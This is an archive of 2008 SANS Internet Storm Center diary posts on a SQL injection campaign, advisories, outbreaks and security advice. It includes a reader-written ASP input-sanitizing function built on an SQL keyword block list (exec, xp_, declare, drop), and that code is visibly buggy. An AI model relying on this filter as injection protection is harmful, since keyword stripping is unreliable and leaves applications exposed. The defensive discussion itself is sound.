Published: 2008-06-30

More SQL Injection with Fast Flux hosting

One of our readers, Elazar, send us some very good analysis of a SQL injection attack.  A summary of his findings are below.  We really appreciate it when readers observe an event, apply some noodle, then send in the analysis.  Thanks Elazar!

Looks like another hit, within the last week or so. More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:


b.js then redirects to several domains which host a cgi script


Which then redirects to ad.js which redirects the user to

This site attempts to trick the user into installing installer.exe

AV coverage is decent:


Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-29

SANSFIRE 2008 - Meet the Handlers

OK, so it's not like Meet the Fockers but what the heck....  In less than a month we'll all be gathering in Washington DC for the annual big event sponsored by the SANS Internet Storm Center.  If you haven't already registered, it's not too late.  But please hurry!  Courses do sell out and you don't want to miss the opportunity to learn from SANS' top instructors and faculty.

While you are at SANSFIRE, be sure to check out our SANS @ Night talks, featuring Handlers from the Internet Storm Center.  We'll also have the annual "State of the Internet" panel where all of the Handlers (at least those who can make it to DC) will be present to talk about what is going on in the world of Internet security and how it applies to you and your networks.

Also, our CTO, Johannes Ullrich will be teaching a class on IPv6 security, Handler Lenny Zeltser will be teaching a class on Reverse Engineering Malware, and I will be teaching a class on Critical Infrastructure Protection.  We're looking forward to seeing you in one of the classes and for the evening talks!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-28

Another Call for Packets - Port 502

Usually, I don't have two calls for packets on a shift, but this one definately bears looking into and hopefully finding an answer.  There is an increase on port 502, when you look at the targets, that started today.  Till today, life has been pretty quiet on that port.  Port 502 is a known port when dealing with SCADA systems.  According to an article on SCADA Honeynets, "Modbus TCP on port 502 is a widely used, standard SCADA protocol in PLC’s and other field devices that monitor sensors and control instruments." 

If you have packets, logs or ideas on this increase, please send them into us.


Published: 2008-06-28

Good Always Comes Out of Bad

In the past couple of days, reports have surfaced on the hijacking of the domains for ICANN and IANA attributed to the group NetDevilz.  According to news articles, an ICANN spokesman stated they were unaware of the events.  The total time for the redirection before the entry was corrected was about twenty minutes.  However it will take 24 to 48 hours after the correction to ensure all the DNS entries are updated.  In that time, users were redirected to a site that stated the follow:

“You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha :) (Lovable Turkish hackers group)”

What triggered the changing of the DNS entries has not been disclosed that I have found.  Dancho Danchevs blog shows an email address listed in the updated records and note the email address in the entry called "foricann1230@gmail.com" as well as the date they were updated as June 26.  Regardless of how it happened (though I'm sure everyone would like to know) there is a big concern here.  Nothing on the internet is safe and if this can happen to these folks, it can happen to anyone. 

It is events such as this that make me more determined to stay a hard nose when it comes to security and protecting the
organization I am supporting.  These events actually do have good that comes out of them.  I always print out these articles and do a screenshot of the article and save it to a file with the url of where I got it.  I can then add them to a presentation and also use them as pass arounds during a presentation or simply highly key points and discuss them with the group.  It is very useful to show to management that the threat is real and we can't let our guard down.  As managers and users alike, they don't understand security, the threats, how they work and the dangers that are lurking on the Internet.  It's hard for management to understand why your security officer sounds like a paranoid lunatic and wants more money for security:>)  Doing this has really helped me to get their attention and to justify the funding to help plus up weak points in our security posture. 

So, take advantage of events that have high publicity such as these, include them in reports to your management and use them to help educate people.  Even though the bad guys may gained an inch, let use it against them to gain a mile in the world of security. We can do this by learning from it and working to use it to increasing awareness and move our own security posture forward. 


Published: 2008-06-28

Call for Packets - Port 19905

One of the things I like to check while on duty are the Trend reports which focus on changes in port activity.  While looking at this today, I noticed a sharp increase in both the source and targets for port 19905.  Generally target increases don't bother me too much and can be attributed to different things.  But with the sources and targets increasing over the past few days for this port, it has me curious.  An increase in both sources and targets can be an indicator of an infection of some sort.  If you have any ideas for this or any packet captures, please send them our way. 




Published: 2008-06-26

Automatic wireless connections

Normally, I'm annoyed when I can't get a wireless connection to the Internet. But recently, while riding the commuter train and working on my laptop, I was surprised by a "connected to..." pop up that was immediately followed by a disconnect. Huh? Time for some checking. Turns out the problem was relatively benign. First of all, I had not turned off wireless like I normally do when it is not in use (I really like the mechanical "radio off" switch at the front of my Thinkpad). Secondly, I had recently stayed at an unnamed motel chain whose WLAN access points were using "Super8" as SSID. Even though I'm usually paying attention to this sort of thing, the SSID ended up staying behind as a "preferred network" with automatic connection in my Windows wireless profiles. I doubt that there is a motel of this chain next to the MTA Harlem line, but at least a matching SSID was present, and my PC eagerly latched on to it.

I don't mind automatic connection to a wireless network that uses a WPA key, there I know at least with some certainty what I am connecting to. But automatic connection to an "open" wireless network only because it happens to be called "Super8" or "Linksys" or whatever .... I really think those days should be over, the sooner the better.  Goes without saying that the list of "preferred networks" on my laptop is now empty again, or at least devoid of any non-WPA networks.



Published: 2008-06-26

How Well Would Your Business Survive?

Well a month has passed since my State - the wonderful State of Iowa, began to receive some of the worst hammering from Mother Nature that we have ever seen.  It started out with Tornado's taking out whole town's at the end of May to the floods taking out towns and a large section of Cedar Rapids in June


It just so happens that I was in Cedar Rapids the first week of June.  I spoke at a State Conference - Safeguard Iowa Partnership and then on to Des Moines where I spoke again.  Little did I know that just days later I would wake to hear that a large section (reported 1200 square blocks) of downtown Cedar Rapids was under water and that the Des Moines area was facing many problems due to high water and over flowing rivers and creeks.  The week before while I was in Cedar Rapids, I went to visit one of my vendors who was located in the downtown area.  They were in a building that had a bank branch on the main floor and their offices occupied the 2nd floor of the building. 


I finally was able to get in touch with them last week.  I asked them how they had faired the flood and they said they hadn't faired well.  They were advised to move out of their facility so they began moving things to higher ground, employee’s homes, etc.  He said that their building ended up under water.  He said that the first floor was completely under water and that they had about 1.5 feet of water in the office area on the second floor.  Now I want you all to close your eyes, and picture a building in your city that is 4 or 5 stories tall.  Imagine that building (with high ceilings) completely under water to the 2nd floor.  We have a building here in the city that I live in that is almost identical to the bank building in Cedar Rapids. I can not imagine the devastation that my fellow Iowan’s are feeling on the other side of the state.  The section of downtown that they were located in had many small businesses, really charming little pubs and restaurants.  They are all gone, under water, building uninhabitable and homes gone. My heart goes out to them.


Iowa is a small state by most people’s standards.  We have a total of 99 counties.  Of those 99 counties 84 have been declared a disaster area by the Governors’ Proclamation and 76 of those counties have received Presidential Proclamations.  We, in my part of the state, have been very fortunate.  Other than the tornado that destroyed our Boy Scout Camp and took the lives of 4 of our finest (Boy Scouts) we have dodged the bullet, but we have felt the pain that the rest of the state has felt.


We don’t have a final accounting of the financial costs to the state and it may be a long time before we know for sure.  However, the news tonight indicated that the loss expected just to the corn and soy crops is estimated to be 3 billion dollars.  Add to this the loss of resources, possessions, businesses and homes and you would think that the great people of Iowa would be ready to just pack it in.   But we aren’t, we are all pitching in, doing whatever needs to be done to make the recovery possible.  And our emergency personnel, Army and Air Guard units and responders, though very tired, have hung in like troopers.  They have made all the difference.


So why am I including this in the diary at the Internet Storm Center?  Really for 2 reasons, one to update those who have asked, those who are concerned.  The second reason is to remind everyone, it is not “IF it happens - it is WHEN it happens".  Your business may never face the magnitude of destruction that we are dealing with, but without a plan, any destruction can mean the end of your business.  Plan for the future - how will your business go on, how will you continue to operate, where will they operate, and what resources will be needed.


If you would like to see photo’s or find out more information about what we are doing and how our recovery is going, check out our websites at http://flood2008.iowa.gov/ and http://www.safeguardiowa.org/. You will find information about our recovery efforts.


To my fellow Iowans I say “I am proud of all of you, proud of your resiliency and your determination”.  We will rebuild, and we will recover and be stronger and closer for having been here.











Published: 2008-06-25

Podcast Episode Seven Posted

Thanks to all of those who joined us live last night!  It was great to have that live feedback.  Johannes, Paul, and I were all live on video and audio, and it worked great.

We published Episode Seven of the Internet Storm Center Podcast this morning.

It would be great if we could increase the live listener count, as I'd like to do a live Q&A via the listeners, (and other fun live events).  I will try and post the live stream address sooner next time.  I know I didn't give you guys alot of warning. 

We had Paul Asadoorian of PaulDotCom Security Weekly as a guest, and it's probably our best podcast yet!

Go grab it through iTunes, and for those of you that are not listeners of PaulDotCom, please subscribe to that one too!

Direct download of the mp3 is here, for those of you that are not iTunes users.



Joel Esler



Published: 2008-06-25

Report of Coreflood.dr Infection

We have had a report tonight of an outbreak of an old friend - a blast from the past.  It appears that this particular outbreak has impacted/infected about 600 machines in a roughly 3000 pc network.  Rick, our reader reporting this, said that they have not been able to determine the exact infection entry point yet but they suspect it is according to Rick:

"Current theory is iframe in web page browsed by an 'IU' (Idiot User). "

I like that line, don't you.  Anyway, he said that they have discovered that this infection has resulted in a bunch of new user id's being created on the computers.  When I asked him if they had discovered the mechanism used to spread to the machines, his reply was:


"My current theory is that the patient 0 system's user was set for sub-domain admin privs, and that allowed it to connect to the C$ share on other systems to infect those systems. Each time an infected system connected to a new system, a user profile was created on that new system. Eventually, all of those infected systems connecting to other systems gave the result of many (30+) user profiles on other systems."

He said that McAfee is reporting "buffer overflow" in a pop-up message on some of the systems and Norton is reporting it as Coreflood.dr.

Rick is hoping some of our readers may have dealt with this bad boy in the past and can provide us with a little insight into what they are seeing.  Please let us know if you have any tips for Rick and his team.


Published: 2008-06-24

Microsoft SQL Injection Prevention Strategy

Microsoft released a security advisory today in reaction to the mass SQL injection exploitation on the Internet. Unlike most other Microsoft's security bulletins and advisories, this one isn't about Microsoft products. In the advisory, "These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database." 

Aside from providing links to information on SQL Injection, Microsoft recommends three approaches to help mitigate SQL Injection.

1. Runtime scanning

HP trimmed down a version of the WebInspect scanner to look for SQL injection vulnerabilities on a running website. Please note this scanner is very basic and should be used for a quick inspection only. I like the fact that the scanner has ability to dump table names, helps eliminate false positives.

2. URLScan

Microsoft's basic Web App Firewall solution. It has capabilities to block unwanted requests. This should only be used as a proactive measure or as emergency fix (short term) for SQL injection vulnerabilities.

3. Code Scanning

MS released a nice ASP source code scanning tool to look for SQL injection flaws. It is focused on SQL injection and seems to produce very few false positives which could be a problem with a lot of code scanners.

You may ask, runtime or code? The answer is both if you can do it. For example, if the ASP file calls a store procedure in the database and then the store procedure perform an exec and concatenate strings to run SQL within the database, code scanning will not flag this problem because the ASP code looks fine (only the store procedure is the problem). Conversely, runtime scanning can miss some portions of the site because this specific version of scanner do not follow Javascript and do not submit POST request during spider process.

Kudo to Microsoft for releasing the tools and information to help developers fix their apps. Also appreciate the free scanner from HP.



Published: 2008-06-24

Podcast Episode Seven Record Notice

Hey all, just to let you all know Johannes, Paul Asadoorian, (Of PaulDotCom Security Weekly fame) and I will be recording the Internet Storm Center Podcast (Episode 7) tonight at 7:30 pm EDT. 

I'll be broadcasting it live on Stickam (Ustream seems to be having issues today):

Paul, Johannes, and I all have stickam accounts and we will all have live video and audio during the podcast, so you will be able to see and interact with all of us!

See you there if you can make it, we want to see if we can get a good amount of live listeners when we do the podcasts, stickam has a chat interface so you can give us LIVE feedback on the topics we are discussing on the podcast.

If you don't want to sign up for an account on Stickam, don't forget our IRC channel on irc.freenode.net, #dshield.  So come and hang out, talk with us about topics, live!


Joel Esler



Published: 2008-06-24

Adobe Reader and Acrobat 8.1.2 Security Update

Adobe released a security update today for Acrobat and Reader 8.1.2. It fixes a vulnerability which allows remote attacker to execute malicious code. This is likely to appear in a malware spreading website near you soon given the track record of the botnet operators. Suggest update this one as soon as possible, http://www.adobe.com/support/security/bulletins/apsb08-15.html



Published: 2008-06-24

SQL Injection mitigation in ASP

With the recent SQL injection attacks on ASP pages. A lot of our readers are scrambling to find fixes for their applications. ASP is an older generation Web scripting language would require a bit more work to prevent SQL injection from happening. One of our reader Brian Erman has written a function to filter out the SQL keywords and also escape some the metacharacters in SQL to prevent SQL injection. from happening.

I have been asked a few times recently just how safe is escaping data before passing to SQL server. The answer is safe but it's not fool-proof, some of the issues have been documented by Chris Anley in his Advanced SQL Injection In SQL Server Application paper. Essentially, escaping input is making bad input less bad, so it's not ideal.

To stop SQL injection at the root, we have to understand that SQL injection happens because the database cannot effectively distinguish between static portion of the SQL statement and the user input. If there is a way we can tell the database - this is static SQL statement and this is user input, SQL injection could be stopped easily.

In actual fact, such mechanism exists, it is called parameterized query. The user input are passed to the SQL server as an argument (sort of like calling a function in programming language), the SQL server during query execution have a way to identify what part of the statement is static control, and which part is user input.

Parameterized queries have been widely publicized, examples are here and here. In classic ASP, parameterized query is possible if you use ADO command object, an example is here. Parameterized query is available on most other web scripting platforms, now is the time to review all your web app before the automated SQL injection exploitation spreads to other language platforms (PHP, CFM, PL)

Want to learn more about SQL injection mitigations? At SANSFIRE,, we will debut our new class, SEC522 "Defending Web Applications". Its an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.





Published: 2008-06-23

Preventing SQL injection

Here is a function that a reader wrote that does sanitizing of input for all inputted data.
I am not an asp function programmer so I can not claim that it is complete or correct
but it does appears to work.

This was written by Brian Erman.
Brian spent many hours testing and modifying to make it work. It has stopped
the insertion of bad data into their database. They have been using it now for
over 1 month and have not had a single SQL injection since they added this function.

It eliminates any string that contains the word "declare" and shoots them
off to Google. It also creates a new string from the old string character by
character into the new string. Not by moving the original character into the string.

It also replaces known keywords (i.e. insert, delete, etc...) that may cause
problems within SQL.

,,,,,,Begin Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Function cleanchars(str)
'this gets put in the program that you want to cleans the data with.
'fname = cleanchars(trim(Request("xxxxx"))) <<<Function Call<<<<<<
'here is the call for the function 
'President Brian Erman
'Nopork Motorsports, Inc.
'2585 Hamner Ave,
'Norco CA 92860    
'This is licensed under the creative commons attribution-noncommercial 3.0 framework
'This function assumes you are using CDO as your object for sending mail, if
'you have CDONTS on your server, simply change the CDO to CDONTS and it
'should process exactly the same.
newstr = ""
if InStr(str, "'") > 0 then
    str = ""
    end if

if instr(str, "DECLARE") > 0 then
    newstr = ""
    Set Mailer = Server.CreateObject("CDO.Message")
    Mailer.From = "Email_From"
    Mailer.To = "Email_To"
    Mailer.Subject = "Your_Domain Hacking Attempt"
    msg = Date & VbCrLf & VbCrLf
    msg = msg & "Hacking Blocked, but check the data" & VbCrLf & VbCrLf
    msg = msg & "STR: " & str & " char " & char &  VbCrLf & VbCrLf
    msg = msg & "Here is the IP " & Request.ServerVariables("REMOTE_ADDR") &  VbCrLf & VbCrLf
    msg = msg & "Web Page " & Request.ServerVariables("URL") &  VbCrLf & VbCrLf
    msg = msg & "Host " & Request.ServerVariables("HOST") &  VbCrLf & VbCrLf
    msg = msg & "Length of String " & len(str) & vbcrlf & vbcrlf
    Mailer.TextBody = msg
    Set Mailer = nothing
end if
For ii = 1 to Len(str)
        char = Mid(str,ii,1)
Select Case char
        case " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y",
"z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2",
"3", "4", "5", "6", "7", "8", "9", "@", ".", "-", "_", "/", "&"
        newstr = newstr & char
Case Else

    Set Mailer = Server.CreateObject("CDO.Message")
    Mailer.From = "Email_From"
    Mailer.To = "Email_To"
    Mailer.Subject = "Your_Domain Hacking Attempt"
    msg = Date & VbCrLf & VbCrLf
    msg = msg & "Hacking Blocked, but check the data" & VbCrLf & VbCrLf
    msg = msg & "STR: " & str & " char " & char &  VbCrLf & VbCrLf
    msg = msg & "Here is the IP " & Request.ServerVariables("REMOTE_ADDR") &  VbCrLf & VbCrLf
    msg = msg & "Web Page " & Request.ServerVariables("URL") &  VbCrLf & VbCrLf
    msg = msg & "Host " & Request.ServerVariables("HOST") &  VbCrLf & VbCrLf
    msg = msg & "Length of String " & len(str) & vbcrlf & vbcrlf
    Mailer.TextBody = msg
    Set Mailer = nothing
End Select

if len(str) > 350 then
    newstr = ""
    end if
if instr(str, "DECLARE") > 0 then
    newstr = ""
    end if

if instr(str, "declare") > 0 then
    end if

if instr(str, "www") > 0 then
    end if

    newstr = Replace(lcase(newstr), " or ", "")
    newstr = Replace(lcase(newstr), " and ", "")
    newstr = Replace(lcase(newstr), " from ", "")
    newstr = Replace(lcase(newstr), " into ", "")
    newstr = Replace(lcase(newstr), "insert", "")
    newstr = Replace(lcase(newstr), "update", "")
    newstr = Replace(lcase(newstr), "set", "")
    newstr = Replace(lcase(newstr), "where", "")
    newstr = Replace(lcase(newstr), "drop", "")
    newstr = Replace(lcase(newstr), "values", "")
    newstr = Replace(lcase(newstr), "null", "")
    newstr = Replace(lcase(newstr), "http", "")
    newstr = Replace(lcase(newstr), "js", "")
    newstr = Replace(lcase(newstr), "declare", "")
    newstr = Replace(lcase(newstr), "script", "")
    newstr = Replace(lcase(newstr), "xp_", "")
    newstr = Replace(lcase(newstr), "CRLF", "")
    newstr = Replace(lcase(newstr), "%3A", "")';  HEX
    newstr = Replace(lcase(newstr), "%3B", "")':
    newstr = Replace(lcase(newstr), "%3C", "")'<
    newstr = Replace(lcase(newstr), "%3D", "")'=
    newstr = Replace(lcase(newstr), "%3E", "")'>
    newstr = Replace(lcase(newstr), "%3F", "")'?
    newstr = Replace(lcase(newstr), "&quot;", "")'"
    newstr = replace(lcase(newstr), "&amp;", "")'&
    newstr = replace(lcase(newstr), "&lt;", "")'<
    newstr = replace(lcase(newstr), "&gt;", "")'&
    newstr = replace(lcase(newstr), "exec", "")'&
    newstr = replace(lcase(newstr), "onvarchar", "")'&
        newstr = replace(lcase(newstr), "set", "")'&
    newstr = replace(lcase(newstr), " cast ", "")'&
    newstr = replace(lcase(newstr), "00100111", "")'
    newstr = replace(lcase(newstr), "00100010", "")';
    newstr = replace(lcase(newstr), "00111100", "")'<
    newstr = replace(lcase(newstr), "select", "")'<
    newstr = replace(lcase(newstr), "0x", "")'<
    newstr = replace(lcase(newstr), "exe", "")'<
    newstr = replace(lcase(newstr), "delete", "")'<
    newstr = replace(lcase(newstr), "go ", "")'<
    newstr = replace(lcase(newstr), "create", "")'<
    newstr = replace(lcase(newstr), "convert", "")'<
    cleanchars = newstr

    End Function
,,,,,,End Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Additionally several sites have published documents describing how to prevent SQL injection.
Open Web Application Security Project:

Canadian Cyber Incident Response Centre:


Published: 2008-06-23

SSH scans, source port 80?

Got an email today from a reader named Justin (thank you Justin) who asks us if we have seen alot of SSH scans with a source port of 80 before.  Of course, the answer is yes, but only in test cases!

I've never actually seen this take place on the internet, (well, yes, I have, but very very rarely), and of course I can cause it with certain nmap settings.  But this kind of scanning isn't commonplace, afaik, to an automated tool or script kiddie run. 

Any information that anyone could provide so that we can help out Justin, and of course the rest of the readers of the Internet Storm Center would be much appreciated.  Please write in via that Contact link at the top of our home page.  Thank you.


Joel Esler



Published: 2008-06-20

BackTrack 3 Released

Over at Remote-Exploit.Org, BackTrack 3 has been released. Thanks Max, Muts, MjM! and Raul.
The download link is BackTrack 3.



Published: 2008-06-20

Safari 3.1.2 for Windows released to address vulnerabilities

Safari 3.1.2 for Windows was released to address;

CVE-ID: CVE-2008-1573
Available for: Windows XP or Vista
Impact: Viewing a maliciously crafted BMP or GIF image may lead to information disclosure

CVE-ID: CVE-2008-2540
Available for: Windows XP or Vista
Impact: Saving untrusted files to the Windows desktop may lead to the execution of arbitrary code

CVE-ID: CVE-2008-2540
Available for: Windows XP or Vista
Impact: Saving untrusted files to the Windows desktop may lead to the execution of arbitrary code

From - "About the security content of Safari 3.1.2 for Windows"

Safari 3.1.2 for Windows - "This update is recommended for all Safari Windows users and includes stability improvements and the latest security updates".

Thanks to all of the folks that submitted links!


Published: 2008-06-20

MS08-030 has a new patch, for XP SP2 & XP SP3

Microsoft issued a new patch, for XP SP2 & XP SP3, for MS08-030: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action".

MS08-030: Vulnerability in Bluetooth stack could allow remote code execution

The Technet Security Vulnerability Research & Defense blog on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".

Related update- KB KB951376 Security Update for Windows XP 

Thanks for the heads-up Guy


Published: 2008-06-19

Time Warner outage

        Time Warner appears to be experiencing an outage of an OC-192 link in Ohio.  Chad and one other reader report that this is giving both throughput, latency and stability problems.

-- Bill Stearns, http://www.stearns.org

UPDATE:  Information received indicates it is all back to normal (Thanks Chad)



Published: 2008-06-18

Cisco Security Advisory

Cisco Intrusion Prevention System (IPS) platforms that have gigabit network interfaces installed and are deployed in inline mode contain a denial of service vulnerability in the handling of jumbo Ethernet frames. This vulnerability may lead to a kernel panic that requires a power cycle to recover platform operation. Platforms deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable.

Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability.

This advisory is posted here


Published: 2008-06-18

Olympics Part II

On June 16th we published a short diary asking for comments about the dangers of bringing laptops, PDAs, cell phones, etc. to China if you are planning to attend the Olympics in August.  We've received a number of interesting comments and I want to share two of them with our readers.  I have not made any changes, these are cut/paste right out of the emails we received.  If you have any comments, you can use the comment button at the bottom of the diary entry or send us your notes via our contact page.

One reader wanting to remain anonymous said:

We are recommending our users be very aware of the devices they take with them.  We have recommended leaving all but essential electronic communications and storage devices behind, to include cellular phones with any storage capability.  Users should be aware of the presence of their equipment at all times, not leaving personal or professional equipment unattended, in a hotel room, or locker for any amount of time, and be ultimately suspicious of any portable storage device purchased, received, or given to/from another party while travelling.  This includes USB, CD, SD (other variations) or any other flash media.  I am particularly concerned with the custom trojan infections coming back through flash-based medias from traveling parties, whether through their personal computers cross-contaminating professional assets, or on media that they bring into the workplace.  These trojan variants typically evade AV for up to three months, are very slow to spread, and present deep, slow infiltration into the machine whose backchannels can lead to data loss and lateral control of other machines.

Protecting the enclave from those that return to the workplace with such an infection relies on strong program whitelists ('gold disks'), standard images, and possibly mandated reimaging on return with all returning data stored to CD media, scanned, and manually reviewed for autorun.inf infection vectors prior to reintroduction.  Support for strong policy enforcement from the highest levels with crystal clear consequences is essential to prevent the enticement of easy work-arounds for returning workers.  Returning expats should have an in-briefing meeting and sign a statement indicating that they have reviewed the policy, are aware of its meaning, and have not brought back any non-company media to the best of their knowledge.  At that time, they are given a one-time opportunity  for amnesty to provide anything they may have forgotten to leave behind.

This may seem harsh, but how valuable is control of company assets, core data, proprietary secrets, etc?  If you don't protect it, China has made it very clear that 'no holds barred' is fair game and they WILL take it to their full advantage.

Another anonymous reader had this to say:

I think it might be even more useful to turn the question posed completely around... 

What do we observe foreign nationals doing when they visit/meet with us in an official capacity on our soil? 

The "us" and "our" being the USA and "official" meaning rubber-meets-the-road business/corporate critical meetings (often times under muti-party/muti-lateral NDA-s, to protect real intellectual property, representing tangible products, resulting from millions of name-that-currency spent on R&D). 

Having participated in a few of these meetings, of late, I can say that senior scientists and engineers employed by great Asian nations have not been bringing any laptops/notebooks/gadgets to said meetings. 

When they carry cel phones/PDAs, these are all scrupiously powered off and tucked out of sight, prior to entering "foreign" (to them) corporate campuses.  It is a parking lot ritual of sorts that I have personally witnessed. 

All notes they take are written on paper.  (As are mine, which I review and flesh out from memory as soon as the last goodbye-s are exchanged.) 

Any electronic presentations they bring are on hardware write-protected USB solid state storage and the meeting's host is expected to provide the computer that will run the presentation (either PowerPoint or PDF). 

Sometimes there are only printed handouts, which may or may not be collected at the conclusion of the meeting.  (Usually handouts that are to be re-collected are uniquely marked in advanced.)

Of course, every one of "us" (myself excluded) attends these same meetings with our laptop/notebook/tablet, cel phone, PDA powered on *and* wireless enabled. 

Many of the latest gee-whiz compute/communicate devices that our Asian counterparts are using day-to-day these days are not for sale on our shores.  We are often times disappointed when we do not get to see these trinkets on display at these meetings. 

What many of us fail to realize is that our auspicious visitors/guests are voluntarily abiding by a scrupulous electronic quarantine, in specific situations, while on our soil. 

Whereas, too many of us tend to be electronic cowboys, with our "rigs" fully exposed, whether or not we happen to be travelling abroad. 

Food for thought???... 

The same anonymous reader had these additional comments:

For "Mark," even if his crew is using terminal services on as-is off-the-shelf stock, what about keystroke loggers and/or rootkits, on the terminal services client machine, that could be planted over-the-wire(less) and need not persist beyond a single snoop session??? 

I am a firm believer in hardening all portable compute devices, as much as they can be, whether or not they're to be taken abroad. 

As-is, from the manufacturer, all my Vista notebooks have had crap like Bluetooth and Firewire services enabled, whether or not there is an internal Bluetooth device or even a Firewire port, by default. 

Presumably, these services are pre-enabled just in case I (or anyone else) decides to plug in an USB-bridged and/or PCMCIA Bluetooth or Firewire device. 

How convenient for me...  and all of my would-be attackers. 

Why should every physical port present (or not) on a mobile compute platform be permitted to become a potentially illicit port of entry/leakage??? 

I prefer to disable everything I don't need for the job and selectively enable what do I need, as much as possible, for only while I need to use it. 

Seriously consider fully supporting (Vista) BitLocker or some other full disk encryption on business critical mobile compute platforms, as well as on removable storage.  MS does not encrypt the pagefile (although I've been told that MacOS does) and some terminal services session data will likely persist for a while in a large pagefile. 

At the very least, I say make the BadGuys(TM) work for pwnership. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-17

Why go high-tech?

We received a report today from an EDU that received hundreds of undeliverable notices from other EDU domains.  Their "helpdesk" email box had been used as the spoofed from address in a simple "ask for the user's password to avoid account closure" attempt to gather email account passwords from unsuspecting college students.  But instead of going to a website, user is just supposed to send the account details to an email address at the bottom of the page.  Turns out that a couple of them replied with their account details to the EDU, instead of the attacker.  It is somewhat of a catch-22 for the attacker - use a more official "from" address and user is more likely to reply; but the same user is likely not to follow the directions at the bottom of the message stating send your reply to xyz@attacker.com. 

The story reminds me of "stupid criminal" stories.  But on the Internet, there is less chance of getting caught and more likelihood that someone will fall for the attack.


Published: 2008-06-16

Going to the Olympics?

Are you or one of your organization's employees planning to attend the Olympics in Beijing this August?  If so, are there any precautions you are taking (or recommending for your staff to take) when bringing computers, PDAs, or other electronics potentially containing intellectual property on a trip to China?  I'm not suggesting that China is a dangerous place (after all, nearly anywhere on the planet you can find trouble) but there has been a lot of talk recently about cybersecurity issues in China.

So we are curious, what are you doing to protect your organization against potential theft, or even worse - the potential addition of "value added features" to your computers and devices while you are not looking?  Send us your ideas, concerns, and comments and we'll add the best ones to this diary.  You can also use the "comment" feature below to directly add your thoughts.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-16

Opera 9.5 is Available

Parth just informed us that Opera 9.5 is available at: www.opera.com/

This version addresses a few security issues: www.opera.com/docs/changelogs/windows/950/#security




Published: 2008-06-15

Happy Father's Day

In most countries June 15th is Father's Day this year.  So, to all of the dads out there in reader-land, we extend our warmest Happy Father's Day wishes.  Kids, be sure to call the Old Man today if you are no longer living at home and tell him how you are doing.  If you are still living in your parent's basement, then come upstairs and tell him how much you appreciate that high-speed Internet connection he's paying for.  :)

While you are on the phone (or IM'ing) with Dear Old Dad, ask him if he's got automatic updates turned on for the home computer and if he keeps his antivirus software updated.  Also check to make sure that he's got a good firewall in place.  Those three things will keep most of the evilware out of the family computer.  Beyond that, we can't stop Dad from surfing to parts of the Internet he should not be going to, from downloading lots of cool widgets and programs, or from engaging in file swapping.  But we can keep him educated on the latest threats and countermeasures.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-14

Malware Detection - Take the Blinders Off

How many times have you sat in a discussion talking about how to protect against malware and the focus is always on what type of  Antivirus to use?  Do you use one vendor to keep it simple or do you use at least two vendors to get better coverage?  I don't disagree that antivirus software is an essential tool in your security architecture and I'm an advocate of it.  But my point is that we have severely restricted our abilities to detect malware when the only focus is only an antivirus solution.  When this is the case, you are operating with blinders on.

Malware development and usage is a rapidly growing area of concern.  Sadly, the developers of malware are getting better and better at fine tuning their craft.  Malware today is very sophisticated with amazing GUI interfaces that make it so easy anyone can use it with no skills required.  It is too easy to create malware that is not detected by antivirus software.  Sadly, by the time the malware is found and detection is provided many days may have passed.  Take Slammer for instance and the fact it infected the majority of the 75,000 systems it compromised within the first ten minutes.  How do you get a signature out to detect something that moves that fast?  The answer is simple...you can't!!

The use of signature based detection has its limitations and developments in behavioral and heuristic based approaches aren't where they need to be yet.  This is not a slam against any antivirus vendors.  I'm simply advocating that we need to take the blinders off an look at other ways we can do detection to increase our security posture.  Just to clarify, I use the term "forensics" because I look at forensics as the art of looking for clues.  That is really what you're doing in all of these.  Looking for clues that would help you spot malware.  Call it whatever you want:>)  Here are some things that can be used to monitor for malware. 

Network Forensics
Network forensics is a method to examine the characteristics of your network traffic and provide early alert warning.  One of the guiding principles when doing any type of analysis is to learn what is normal.  If you learn what is normal, the abnormal will immediately stand out to you.  All network traffic has patterns that are unique to that network.  By watching your network traffic, you can determine rapidly what is abnormal.  With network speeds today, one of the best methods of doing this is graphical analysis.  They are many tools out there that will graphically display your communication flows.  You can visually see where your traffic is going and abnormal traffic patterns instantly stand out.  For instance, if your watching your connections and suddenly 2 boxes, then 10, then 20 etc. all start trying to connect to IP address that is not their normal pattern, you would want to check that out.  If its malware related, you will be able to find out very quickly and provide protection for your network.  With visual monitoring, abnormalities stand out very quickly. 

Web traffic Forensics
I also recommend doing forensics on your web traffic.  The same methodology applies.  Look for the abnormalities in your traffic.  Since port 80 is open, its a good target.  I wrote a diary a while back on a piece of undetected malware that used a covert channel over port 80 to get its commands.  Forensics on your web traffic would have spotted that site suddenly showing up at repeated intervals in your analysis.

Host Based Forensics
